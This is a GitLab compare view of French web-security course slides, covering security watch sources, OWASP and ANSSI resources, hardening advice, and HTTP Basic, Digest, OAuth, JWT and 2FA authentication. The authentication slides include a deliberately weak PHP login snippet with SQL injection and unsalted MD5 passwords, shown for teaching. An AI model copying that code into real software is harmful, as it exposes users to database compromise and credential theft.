Skip to content
Snippets Groups Projects

Compare revisions

Changes are shown as if the source revision was being merged into the target revision. Learn more about comparing revisions.

Source

Select target project
No results found

Target

Select target project
  • vimazeno/blog.limos.fr
  • matrossevi/blog.limos.fr
  • borlonjo/blog.limos.fr
3 results
Show changes
Hide whitespace changes
Inline Side-by-side
Showing
with 1693 additions and 0 deletions
content/slides/1337/images/xss/XSS-serveurvictime.png 0 → 100644
View file @ 12c34d1d
content/slides/1337/images/xss/XSS-serveurvictime.png

7.37 KiB

content/slides/1337/images/xss/XSS-site.png 0 → 100644
View file @ 12c34d1d
content/slides/1337/images/xss/XSS-site.png

13.7 KiB

content/slides/1337/images/xss/XSS-sitefaille.png 0 → 100644
View file @ 12c34d1d
content/slides/1337/images/xss/XSS-sitefaille.png

15.1 KiB

content/slides/1337/images/xss/XSS-sitepiege.png 0 → 100644
View file @ 12c34d1d
content/slides/1337/images/xss/XSS-sitepiege.png

16.4 KiB

content/slides/1337/images/xss/XSS.png 0 → 100644
View file @ 12c34d1d
content/slides/1337/images/xss/XSS.png

21.9 KiB

content/slides/1337/images/xss/beef-webcam.jpg 0 → 100644
View file @ 12c34d1d
content/slides/1337/images/xss/beef-webcam.jpg

250 KiB

content/slides/1337/images/xss/csp.png 0 → 100644
View file @ 12c34d1d
content/slides/1337/images/xss/csp.png

43 KiB

content/slides/1337/images/xss/inspector.png 0 → 100644
View file @ 12c34d1d
content/slides/1337/images/xss/inspector.png

52.3 KiB

content/slides/1337/images/xss/redirect.png 0 → 100644
View file @ 12c34d1d
content/slides/1337/images/xss/redirect.png

25.8 KiB

content/slides/1337/images/xss/sop.png 0 → 100644
View file @ 12c34d1d
content/slides/1337/images/xss/sop.png

19.3 KiB

content/slides/1337/js.html 0 → 100644
View file @ 12c34d1d
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>JS</title>
<link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
<link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
<!-- Theme used for syntax highlighting of code -->
<link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
<link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
<link rel="stylesheet" href="../main.css">
<!-- Printing and PDF exports -->
<script>
var link = document.createElement( 'link' );
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
document.getElementsByTagName( 'head' )[0].appendChild( link );
</script>
</head>
<body>
<div class="reveal">
<div class="slides">
<section data-markdown="md/js.md"
data-separator="^\n\n\n"
data-separator-vertical="^\n\n"
data-separator-notes="^Note:"
data-charset="utf-8">
</section>
</div>
</div>
<script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
<script src="../../node_modules/reveal.js/js/reveal.js"></script>
<script>
// More info about config & dependencies:
// - https://github.com/hakimel/reveal.js#configuration
// - https://github.com/hakimel/reveal.js#dependencies
Reveal.initialize({
controls: true,
progress: true,
history: true,
center: false,
dependencies: [
{ src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
{ src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
condition: function() { return !!document.querySelector( '[data-markdown]' ); },
callback: function() {
Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
var fragIndex = ele.innerHTML.indexOf("--")
if (fragIndex != -1){
ele.innerHTML = ele.innerHTML.replace("--", "");
ele.className = 'fragment';
}
});
}
},
{ src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
{ src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
]
});
</script>
</body>
</html>
content/slides/1337/lab.html 0 → 100644
View file @ 12c34d1d
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>Web Sec Lab</title>
<link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
<link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
<!-- Theme used for syntax highlighting of code -->
<link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
<link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
<link rel="stylesheet" href="../main.css">
<!-- Printing and PDF exports -->
<script>
var link = document.createElement( 'link' );
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
document.getElementsByTagName( 'head' )[0].appendChild( link );
</script>
</head>
<body>
<div class="reveal">
<div class="slides">
<section data-markdown="md/lab.md"
data-separator="^\n\n\n"
data-separator-vertical="^\n\n"
data-separator-notes="^Note:"
data-charset="utf-8">
</section>
</div>
</div>
<!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
<script src="../../node_modules/reveal.js/js/reveal.js"></script>
<script>
// More info about config & dependencies:
// - https://github.com/hakimel/reveal.js#configuration
// - https://github.com/hakimel/reveal.js#dependencies
Reveal.initialize({
controls: true,
progress: true,
history: true,
center: false,
dependencies: [
{ src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
{ src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
condition: function() { return !!document.querySelector( '[data-markdown]' ); },
callback: function() {
Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
var fragIndex = ele.innerHTML.indexOf("--")
if (fragIndex != -1){
ele.innerHTML = ele.innerHTML.replace("--", "");
ele.className = 'fragment';
}
});
}
},
{ src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
{ src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
]
});
</script>
<script src="../main.js"></script>
</body>
</html>
content/slides/1337/md/anticiper.md 0 → 100644
View file @ 12c34d1d
# Anticiper
## aka le métier qui rentre ...
## Trouver des mentors
![Bruce Schneier quote](images/anticiper/Bruce-Schneier-Quotes-1.jpg "Bruce Schneier quote")
## Trouver des mentors
![Bruce Schneier quote](images/anticiper/Bruce-Schneier-Quotes-5.jpg "Bruce Schneier quote")
<i class="fa fa-quote-left"></i> la sécurité n'est pas un produit c'est un process <i class="fa fa-quote-right"></i> _Bruce Schneier_
## Organiser sa veille
* [CVE (Common Vulnerabilities and Exposures)](http://cve.mitre.org/index.html)
* MITRE est une société qui
* a lancé le projet CVE ("Common Vulnerabilities and Exposures")
* facilite l'échange d'information de sécurité
* maintient les ID de vulnérabilité
* [CVE Details](https://www.cvedetails.com/)
* custom RSS
## phpMyAdmin
![phpMyAdmin](images/anticiper/phpmyadmin-vuln.png "phpMyAdmin")<!-- .element width="90%" -->
Note:
- bien percé
- Ne pas trop exposer
- bien pratique
- Utiliser un client lourd
- MySQL Workbench
## Organiser sa veille
* [National Vulnerability Database - US](https://nvd.nist.gov/)
* [CERT EU](https://cert.europa.eu/cert/filteredition/en/CERT-LatestNews.html)
* [CERT FR](http://www.cert.ssi.gouv.fr/cert-fr/certfr.html) - [archive 2015](http://www.cert.ssi.gouv.fr/site/2015index.html)
* [CERT RENATER](https://services.renater.fr/ssi/cert/index) - [sécurité](https://services.renater.fr/ssi/securite/index)
* et d'autres [CSIRT](http://www.cert.ssi.gouv.fr/cert-fr/cert.html)
## Organiser sa veille
* Sources reconnues
* [Bugtraq - Security Focus](http://www.securityfocus.com/bid)
* [Open Source Software Security Wiki](http://oss-security.openwall.org/wiki/)
* [<i class="fa fa-envelope"></i> Mailing list](http://oss-security.openwall.org/wiki/mailing-lists/oss-security)
* [<i class="fa fa-twitter"></i> openwall](https://twitter.com/openwall)
* [SecLists.Org Security Mailing List Archive](http://seclists.org/)
## Organiser sa veille
* Sources alternatives
* [Exploit Databse](https://www.exploit-db.com)
* [Shodan - Popular Searches](https://www.shodan.io/explore/popular)
* [Shodan - Recently Shared](https://www.shodan.io/explore/recent)
* Sources spécialisés
* [WPScan Vulnerability Database](https://wpvulndb.com/)
* [drupalexploit.com](http://www.drupalexploit.com/)
## Organiser sa veille
* <i class="fa fa-twitter"></i> twitter
* [<i class="fa fa-list-alt"></i> ma liste ssi-infosec-hack](https://twitter.com/mazenovi/lists/ssi-infosec-hack)
* <i class="fa fa-wordpress"></i> blog
* en anglais
* https://googleonlinesecurity.blogspot.fr/
* https://www.schneier.com/
* https://nakedsecurity.sophos.com/
Note:
- parler de netvibes et yahoo pipes (qui ets mort)
- considérer les solutions hébergées
## Organiser sa veille
* <i class="fa fa-wordpress"></i> blog
* en français
* http://www.bortzmeyer.org/
* https://reflets.info/
* http://zythom.blogspot.fr/
* http://www.nolimitsecu.fr
* http://news0ft.blogspot.fr
## Organiser sa veille
* autre ...
* en français
* http://www.security-feeds.com/
* http://vigilance.fr/
* http://www.datasecuritybreach.fr/
* http://www.zataz.com/
* http://www.globalsecuritymag.fr/
* http://assiste.com/
## OWASP
* depuis janvier 2001
* fondation Américaine
* [à but non lucratif](http://en.wikipedia.org/wiki/501%28c%29_organization#501.28c.29.283.29)
* en France
* Association loi 1901
* participe au [clusif - Club de la Sécurité de l’Information Français](http://www.clusif.asso.fr/)
* Ludovic Petit & [Sebastien Gioria ](https://twitter.com/spoint)
* [L'OWASP, l'univers, et le reste](https://air.mozilla.org/talks-owasp-afup-firefoxos-security-mozilla-firefoxos-what-is-owasp-by-sebastien-gioria/)
## OWASP - Indépendance
* composé d'expert indépendants
* indépendant des fournisseurs de solution
* indépendant des gouvernements
* Les projets sont opensource
* nombreux adhérents
* entreprises
* institutions
* [individus](https://docs.google.com/spreadsheets/d/1FQEj2xQb1uTxZMXshPs0suy1Bkb5iYCbHH_vrzHMVa4/edit)
* [join now](http://myowasp.force.com/memberappregion): <strike>adhésion gratuite</strike> donation obligatoire 50$ minimum
Note:
- le marché de la sécurité est blindé de commericaux
- et de conflit d'intérêt
## OWASP - Projets
!["OWASP Flagship mature project"](images/anticiper/Flagship_banner.jpg "OWASP Flagship mature project")<!-- .element width="70%"-->
!["OWASP Lab medium level project"](images/anticiper/Lab_banner.jpg "OWASP Lab medium level project")<!-- .element width="70%"-->
!["OWASP Low activity project"](images/anticiper/Low_activity.jpg "OWASP Low activity project")<!-- .element width="70%"-->
!["OWASP Incubator new projects"](images/anticiper/Incubator_banner.jpg "OWASP Incubator new projects")<!-- .element width="70%"-->
## [Owasp projects](https://www.owasp.org/index.php/Category:OWASP_Project#tab=Project_Inventory)
* [OWASP Top Ten project](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project)
* [OWASP Testing Guide](https://www.owasp.org/index.php/OWASP_Testing_Project)
* [OWASP Risk Rating Methodology](https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology)
* [OWASP Code Review Guide](https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project)
* [OWASP Developer Guide](https://www.owasp.org/index.php/OWASP_Guide_Project)
## [Owasp projects](https://www.owasp.org/index.php/Category:OWASP_Project#tab=Project_Inventory)
* [OWASP Enterprise Security API](https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API)
* [OWASP Application Security Desk Reference](https://www.owasp.org/index.php/Category:OWASP_ASDR_Project)
* [OWASP Cheat Sheets](https://www.owasp.org/index.php/Cheat_Sheets)
* [OWASP Application Security Verification Standard (ASVS)](http://www.owasp.org/index.php/ASVS)
* [OWASP Legal Project](http://www.owasp.org/index.php/Category:OWASP_Legal_Project)
* [and more ...](https://www.owasp.org/index.php/Category:OWASP_Project#tab=Project_Inventory)
## [ANSSI](href="http://www.ssi.gouv.fr)
* organisme de
* [formation](http://www.ssi.gouv.fr/fr/anssi/formations/)
* sensibilisation / recommandation
* [guide d'hygiène informatique](http://www.ssi.gouv.fr/IMG/pdf/guide_hygiene_informatique_anssi.pdf)
* [Objectifs de sécurité (dans le cadre du plan vigipirate)](http://www.ssi.gouv.fr/fr/defense-des-si/les-plans-gouvernementaux/) et au niveau [OIV](http://www.ssi.gouv.fr/actualite/lanssi-sattele-aux-decrets-dapplication-de-la-lpm-portant-sur-la-protection-des-operateurs-dimportance-vitale/)
* [cybersécurité des système industriels](http://www.ssi.gouv.fr/fr/guides-et-bonnes-pratiques/recommandations-et-guides/securite-des-systemes-industriels/la-cybersecurite-des-systemes-industriels.html)
* [Sécuriser un site web](http://www.ssi.gouv.fr/guide/recommandations-pour-la-securisation-des-sites-web/)
* [Protéger son site Internet des cyberattaques](http://www.ssi.gouv.fr/actualite/proteger-son-site-internet-des-cyberattaques/)
## [ANSSI](href="http://www.ssi.gouv.fr)
* certfication
* [de produits de sécurité](http://www.ssi.gouv.fr/fr/produits-et-prestataires/produits-certifies-cc/)
* [de prestataires de services de confiance](http://www.ssi.gouv.fr/fr/produits-et-prestataires/prestataires-de-services-de-confiance-qualifies/)
* d'intervention / investigation
[<i class="fa fa-book"></i> La Stratégie nationale pour la sécurité du numérique : une réponse aux nouveaux enjeux des usages numériques](http://www.ssi.gouv.fr/actualite/la-strategie-nationale-pour-la-securite-du-numerique-une-reponse-aux-nouveaux-enjeux-des-usages-numeriques/)
Note:
- de la com pourrie aussi [HACK ACADEMY : DE DRÔLES DE HACKERS AU SERVICE DE LA PRÉVENTION](http://www.ssi.gouv.fr/actualite/hack-academy-de-droles-de-hackers-au-service-de-la-prevention/)
## Autres entités SSI françaises
* [OzSSI](http://www.ssi.gouv.fr/agence/cybersecurite/ozssi/)
* [Zomm sur les OzSSI](http://www.ssi.gouv.fr/actualite/zoom-sur-les-ozssi/)
* [OSSIR](http://www.ossir.org/)
* [CLUSIF](https://www.clusif.asso.fr/)
* [CLUSIR Rhône Alpes](http://www.clusir-rha.fr/)
* CLUSIR Auvergne?
## Best Practices / Cheat sheets / Checklists
* Généraliste
* http://www.sans.org/critical-security-controls/
* [The Joel Test: 12 Steps to Better Code](http://www.joelonsoftware.com/articles/fog0000000043.html)
* OWASP
* [OWASP Proactive Controls](https://www.owasp.org/index.php/OWASP_Proactive_Controls)
* Linux
* https://www.sans.org/media/score/checklists/linuxchecklist.pdf
## Best Practices / Cheat sheets / Checklists
* Apache
* http://httpd.apache.org/docs/2.4/misc/security_tips.html
* http://geekflare.com/10-best-practices-to-secure-and-harden-your-apache-web-server/
* http://www.tecmint.com/apache-security-tips/
* http://blogs.reliablepenguin.com/2012/10/09/apache-configuration-best-practicies
## Best Practices / Cheat sheets / Checklists
* Nginx
* http://www.cyberciti.biz/tips/linux-unix-bsd-nginx-webserver-security.html
* Wordpress
* http://mazenovi.github.io/blog/2015/01/28/securing-wordpress/
* Drupal
* https://www.drupal.org/project/security_review
#### Proposition d'Hervé Schauer
[HSC Newsletter](https://www.hsc.com.vn/en/help-center/other-services/hsc-newsletter) -- N°135
* Utilisez-vous systématiquement des requêtes SQL préparées (connues aussi sous le nom de requêtes paramétrées) ?
* Utilisez-vous la gestion de session d'un cadriciel/bibliothèque fiable ?
* Encodez-vous systématiquement les valeurs venant de l'extérieur (utilisateur, base de données...) avant de les envoyer vers l'affichage ?
* Utilisez-vous SSL/TLS sur la totalité de votre site ?
#### Proposition d'Hervé Schauer
* Stockez-vous et vérifiez-vous les mots de passe utilisateurs uniquement en les dérivant avec *sha256crypt*, *bcrypt*, *scrypt*, *pbkdf2(sha256)* ou *argon2*?
* Évitez-vous systématiquement d'utiliser les entrées utilisateurs pour des appels systèmes ?
* Stockez-vous les téléchargements utilisateurs vers l'application (uploads) dans un environnement restreint ?
#### Proposition d'Hervé Schauer
* Séparez-vous les paramètres secrets du code ?
* Faites-vous un suivi de version de tout votre code ?
* Gérez-vous vos dépendances et leur sécurité ?
Note:
- c'est le web beaucoup de gens ne savent pas ce qu'ils racontent ...
- faire marcher la tête et ne pas totu copier / coller sur un espace de prod
- pensez la sécurité au moment du choix du design pattern
## utiliser tls
* ne jamais utiliser FTP
* ftps et sftp fonctionnent parfaitement
* rsync et scp aussi
* chrooter un user ssh
* https://stdout.cowthink.org/setup-chroot-jails-in-linux-and-only-allow-sftp/
* généraliser l'utilisation d'https
* [Google favorise les sites en HTTPS, c'est un critère officiel du référencement naturel](http://www.webrankinfo.com/dossiers/conseils/https-critere-seo)
* désactiver les services de types POP3, IMAP, SMTP
* utiliser les versions SSLifiées
#### [ISPConfig](http://www.ispconfig.org/page/home.html)
![ISPConfig](images/anticiper/ispconfig.jpg "ISPConfig")
[tuto d'install](https://www.howtoforge.com/tutorials/ispconfig/)
Note:
- suExec, suPHP, chrooting avec jailkit, rkhunter
- [auto install](https://www.howtoforge.com/tutorial/ispconfig-install-script-debian/)
## Symfony
* A1
* ORM (Doctrine / Propel)
* SQLi
* librairie system / Service Parameters typés
* Command injection
* namespace / service
* LFI / RFI
## Symfony
* A2
* FOSUserBundle
* A3
* twig
* échappe par défaut
* A4
* security.yml
* Firewall donnant une vue globale sur la sécurité des objets
## Symfony
* A5
* configuration par défaut secure
* A6
* [igorw/IgorwFileServeBundle](https://github.com/igorw/IgorwFileServeBundle)
* A7
* système d'ACL
## Symfony
* A8
* système de jeton par défaut
* pour totue soumission de formulaire
* A9
* basé sur github & composer
* A10
* Service Parameters typés
## Parler sécurité
* Revue de code
* Rendre les checklists collaboratives
* Bug bounty
* <i class="fa fa-beer"></i> Bières, restos, sandwichs
* ce que font les grands
* google, FB, etc ...
* DevOps
* Be fullstack
* [Discuter les modèles (exposer ou cacher)](https://en.wikipedia.org/wiki/Open-source_software_security)
Note:
- si Microsoft ouvre tout ce n'est pas un hasard c'est que ca marche
#### Positiver
![Be positive](images/anticiper/bepositive.jpg "Be positive")<!-- .element width="50%" -->
Note:
- effort supplémentairer à moyen constant
- pas le choix sur la présentation
## Utiliser des outils de gestion de dépendance
* Bonne pratique
* permet d'éviter des problèmes de compatibilités
* permet une mise à jour globale
* permet un meilleur déploiement
* [composer](https://getcomposer.org/) (PHP)
* [bower](http://bower.io/) (Javascript client)
* [npm](https://www.npmjs.com/) (Javascript server)
* [pip](https://pypi.python.org/pypi/pip) (Python)
* [gems](https://rubygems.org/) (Ruby)
## Analyser le code
* pas d'outil miracle
* peut être dans les très spécialisés et les très chers?
* statique
* lecture du code
* grep -nR
* [netbeans](https://netbeans.org/downloads/)
* ctrl+clic
* [OWASP Code Review Project](https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project)
## Analyser le code
* dynamique
* exécution du code
* [OWASP Testing Project](https://www.owasp.org/index.php/OWASP_Testing_Project)
* ~ Fuzzing
* [XDebug](http://xdebug.org/)
* [KCacheGrinder](http://kcachegrind.sourceforge.net/html/Home.html)
* [BlackFiler Profiler](https://blackfire.io/)
Note:
- les outils de gestion de version rendent services
- long et souvent très spécialisé
## Tests & Intégration continue (CI)
* utiliser un outil de versionning
* [git](https://git-scm.com/), [svn](https://subversion.apache.org/), [mercurial](https://www.mercurial-scm.org/wiki/)
* rétrochronologie des vulnérabilités
* utiliser les environnements
* prod, dev, test, staging, deploy, ...
* les secrets de la CI
* [vault by HashiCorp](https://www.vaultproject.io/)
évite le leak de configuration
## Tests & Intégration continue (CI)
* tester
* intégrer la sécurité au tests
* aspect fonctionnel
* [behat](http://docs.behat.org/en/v2.5/)
* [casperjs](http://casperjs.org/) sur la base de [phantomjs](http://phantomjs.org/)
* [selenium](http://www.seleniumhq.org/)
* jouer les tests régulièrement via la ci [gitlab](https://gitlab.com/), [jenkins](https://jenkins-ci.org/), [Travis](https://travis-ci.org/), ...
## Déploiement logiciel
* via la ci [gitlab](https://gitlab.com/), [jenkins](https://jenkins-ci.org/), [Travis](https://travis-ci.org/), ...
* [githook](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks)
* [capistrano](http://capistranorb.com/)
* [capifony](http://capifony.org/)
* [<i class="fab fa-github"></i> capistrano/symfony](https://github.com/capistrano/symfony)
* [Fabric](http://www.fabfile.org/)
* bash <3
## filtrer
* [ngnix](http://nginx.org/)
* permet de filtrer rapidement et efficacement
* [Web application Firewal (WAF)](http://www.cert-ist.com/pub/files/Document_Cert-IST_000333.pdf)
* [mod_security](https://www.modsecurity.org/)
* permet entre autre de logger la méthode post facilement
* gare à l'espace disque
* [<i class="fab fa-github"></i> SpiderLabs/owasp-modsecurity-crs](https://github.com/SpiderLabs/owasp-modsecurity-crs)
* expressions régulières complexes
## Monitorer
* Avoir un outil d'analyse de log
* permet de connaître le bruit
* beaucoup d'attaques a priori
## Etudier des pistes radicales
* déporter le back office
* utiliser la génération de code
* [<i class="fab fa-github"></i> sculpin/sculpin](https://sculpin.io)
* [<i class="fab fa-github"></i> getpelican/pelican](https://github.com/getpelican/pelican)
* interdire l'upload de fichier
* utiliser markdown (pure) pour la mise en forme
* ou tout autre système de texte enrichi
* ne rien mettre sur le web
## S'entrainer
* jamais sur de la prod
* ni la vôtre
* ni celle des concurrents
* Challenges
* http://www.root-me.org/
* https://www.newbiecontest.org/
* https://github.com/ctfs
## S'entrainer
* VM
* http://www.bonsai-sec.com/en/research/moth.php
* http://sourceforge.net/projects/lampsecurity/
* http://hackxor.sourceforge.net/cgi-bin/index.pl
* http://sourceforge.net/projects/exploitcoilvuln/
* https://www.vulnhub.com/entry/metasploitable-1,28/
* http://sourceforge.net/projects/metasploitable/
## S'entrainer
* Weak apps
* http://sourceforge.net/projects/mutillidae/
* http://sechow.com/bricks/
* https://www.pentesterlab.com/
* http://hackingdojo.com/dojo-media/
## Conclusion
<div style="text-align: center">
![Conseil de Jedi](images/anticiper/yoda.gif "Conseil de Jedi")
</div>
## Conclusion
* <i class="fa fa-bullhorn"></i> une veille efficace tu maintiendras
* <i class="fa fa-bullhorn"></i> toutes les mises à jour asap tu effectueras
* <i class="fa fa-bullhorn"></i> toutes tes entrées tu filteras
* <i class="fa fa-bullhorn"></i> toutes tes sorties tu échapperas
* <i class="fa fa-bullhorn"></i> par listes blanches tu réfléchiras
* <i class="fa fa-bullhorn"></i> les bonnes pratiques tu étudieras
* <i class="fa fa-bullhorn"></i> un système fiable de déploiement tu utiliseras
* <i class="fa fa-bullhorn"></i> avec ton équipe de sécurité tu parleras
Note:
- cacher n'est pas protégé
content/slides/1337/md/authentication.md 0 → 100644
View file @ 12c34d1d
# authentification
"processus permettant à un système de s'assurer de la légitimité de la demande d'accès faite par une entité (être humain ou un autre système...) afin d'autoriser l'accès de cette entité à des ressources du système (systèmes, réseaux, applications…) conformément au paramétrage du contrôle d'accès ."
<i class="fa-brands fa-wikipedia-w"></i>ikipédia
### 3 concepts
* identification
* **authentification**
* ACL
### preuves
* **ce que je sais**: mot de passe, numéro d'identification personnel
* **ce que je possède**: carte d'identité, carte à puce, certificat électronique, Token, Token OTP, périphérique
* **ce que je suis**: photo, caractéristique physique, voire biométrie
* **ce que je sais faire**: geste, signature
# quelques techniques
## du world wide web
### A base de login / mot de passe
### apache & .htaccess
* [EnablingUseOfApacheHtaccessFiles](https://help.ubuntu.com/community/EnablingUseOfApacheHtaccessFiles)
* surcharge du vhost courant (déconseillé)
```
$ sudo vi /etc/apache2/apache2.conf
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride All # None par défaut
Order allow,deny
allow from all
</Directory>
```
Note:
- potentiellement danegreux
- php.ini surchargeable aussi
- tems d'exec max
- taille de fichier max
- reporting d'erreur
- configurable en cas de virtual hosting
- à creuser
### auth basic / .htaccess
```
$ vi /var/www/http-basic/.htaccess
AuthType Basic
AuthName "Big Basic Secret"
AuthUserFile /var/www/http-basic/.htpasswd
Require valid-user
```
[htpasswd](https://httpd.apache.org/docs/2.2/programs/htpasswd.html) outil de création des utilisateurs
```
$ htpasswd -c /var/www/http-basic/.htpasswd guest
$ htpasswd /var/www/http-basic/.htpasswd otheruser
```
### auth basic / requête
le client demande un contenu (protégé)
```http
GET /http-basic/ HTTP/1.1
Host: go.od
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
```
### auth basic / réponse
le serveur répond que le contenu est protégé
```http
HTTP/1.1 401 Authorization Required
Date: Wed, 21 Oct 2015 13:26:29 GMT
Server: Apache/2.2.22 (Debian)
WWW-Authenticate: Basic realm="Big Basic Secret"
Content-Length: 472
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Authorization Required</title>
</head><body>
<h1>Authorization Required</h1>
</body>
```
### auth basic
![HTTP basic auth](images/authentication/http-basic-auth.png "HTTP basic auth")
### auth basic
```http
GET /http-basic/ HTTP/1.1
Host: go.od
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Authorization: Basic b3dhc3A6cGFzc3dvcmQ=
```
[base64](https://fr.wikipedia.org/wiki/Base64)(username:password)
### auth digest
* Même schéma que la version Basic excepeté
* algorithme de hashage [MD5](https://fr.wikipedia.org/wiki/MD5) plutôt qu'un simple encodage [base64](https://fr.wikipedia.org/wiki/Base64)
* ajout d'un [nonce](http://fr.wikipedia.org/wiki/Nonce_cryptographique), rattacher à la session de communication, pour éviter les [attaques "par rejeu"](https://fr.wikipedia.org/wiki/Attaque_par_rejeu)
```
$ sudo a2enmod auth_digest
$ sudo service apache2 reload
```
### auth digest
!["Basic Digest Auth"](images/authentication/http-digest-auth.png "Basic Digest Auth")<!-- .element style="background-color: white" -->
### auth digest / .htaccess
```
$ vi /var/www/http-digest/.htaccess
AuthType Digest
AuthName "authdigest"
AuthDigestDomain "/"
AuthDigestProvider file
AuthUserFile "/var/www/http-digest/.htdigest"
Require valid-user
```
[htdigest](https://httpd.apache.org/docs/2.2/fr/programs/htdigest.html) outil de création des utilisateurs
```
htdigest -c /var/www/http-basic/.htdigest "authdigest" guest
htdigest /var/www/http-basic/.htdigest "authdigest" otheruser
```
### auth digest
* le client demande un contenu (protégé)
* le serveur répond que le contenu est protégé
```http
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="OwaspSample",
nonce="Ny8yLzIwMDIgMzoyNjoyNCBQTQ",
opaque="0000000000000000", \
stale=false,
algorithm=MD5,
qop="auth"
```
### auth digest
![HTTP digest auth](images/authentication/http-basic-auth.png "HTTP digest auth")
### auth digest
```http
GET /example/owasp/test.asmx HTTP/1.1
Accept: */*
Authorization: Digest username="owasp",
realm="OwaspSample",
qop="auth",
algorithm="MD5",
uri="/example/owasp/test.asmx",
nonce="Ny8yLzIwMDIgMzoyNjoyNCBQTQ",
nc=00000001,
cnonce="c51b5139556f939768f770dab8e5277a",
opaque="0000000000000000",
response="2275a9ca7b2dadf252afc79923cd3823"
```
Note:
- haché plus réversible même si MD5 ca craint un peu
- le nonce evite le rejeu
- le serveur connait les nonce qu'il a émis
- il sait qu'ils ne sont valables qu'une fois
- http://slideplayer.fr/slide/1622495/ -> slide 30
- le cnonce agit comme un salt
- évite le cassage du mot de passe par dictionnaire
- toujours pas de lockout
- attaque man in the middle
- demande de nonce au serveur et l'envoie au client et renvoie le resultat du cacul au serveur
- pas de blocage testable à l'infini
### authentification par formulaire
```html
<form method="POST" action="login">
<input type="text" name="username">
<input type="password" name="password">
</form>
```
```php
$connect = mysqli_connect("host","user","pwd", "db");
$result = $connect->query(
"SELECT password FROM user WHERE Username = '$_POST['username'];"
);
if(mysqli_num_rows($result) > 0 ){
$row = mysqli_fetch_assoc($result);
if($row["password"] == md5($_POST['password']))
{
echo "auth success";
}
}
echo "auth failed";
```
### authentification par formulaire
* le mot de passe est transmis en clair au serveur
* https :)
* stocker les mots de passe en clair sur le serveur est une mauvaise idée
* [Rockyou.com en 2010](http://commedansdubeurre.ch/?story=162-piratage-de-32-millions-de-comptes-utilisateurs-chez-rockyou-recours-collectif-depose)
* stocker les hashés est une bonne pratique
* saler les hashés est encore mieux
### oAuth
![oAuth](images/authentication/oAuth.png "oAuth")
### oAuth
| Version | SSL | Token | Technique |
| ------- | ----------- | --------------- | ------------------------ |
| 1.0 | optionel | sans expiration | mise en place compliquée |
| 2.0 | obligatoire | révocable | simple et plus léger |
* 1.0 incompatible avec 2.0
* <i class="fa fa-newspaper-o"></i> [How to Secure Your REST API using Proven Best Practices](https://stormpath.com/blog/secure-your-rest-api-right-way)
Note:
- authentification simple (instagram)
- souvent autorisations partielles attribuées à l'app
- le token évite de rejouer l'auth
- oAuth 1.0 en clair lire le token
- pas de consensus sur la version 1 ou 2 sur Internet
- confiance dans consumer (l'app qui demande l'autorisation)
### SSO
* [CAS](http://www.apereo.org/cas)
##### "Identity providers (IdPs) supply user information, while service providers (SPs) consume this information and give access to secure content"
* [keycloak](https://www.keycloak.org/)
* [OpenID](https://openid.net/)
* [SAML](https://fr.wikipedia.org/wiki/SAML) [Shibboleth](images/authentication/Shibboleth.png)
* [lemonldap-ng](https://lemonldap-ng.org/welcome/)
### JWT
[![jwt auth](images/authentication/jwt-auth.png "jwt auth")<!-- .element style="width: 80%" -->](https://blog.ippon.fr/2017/10/12/preuve-dauthentification-avec-jwt/)
### 2FA
![Google Authenticator](images/authentication/google-authenticator.png)
https://www.google.com/landing/2step/
### 2FA / Yubikey
[![Ubikey](../privacy/images/passwords/yubikey.png)](https://www.yubico.com/)
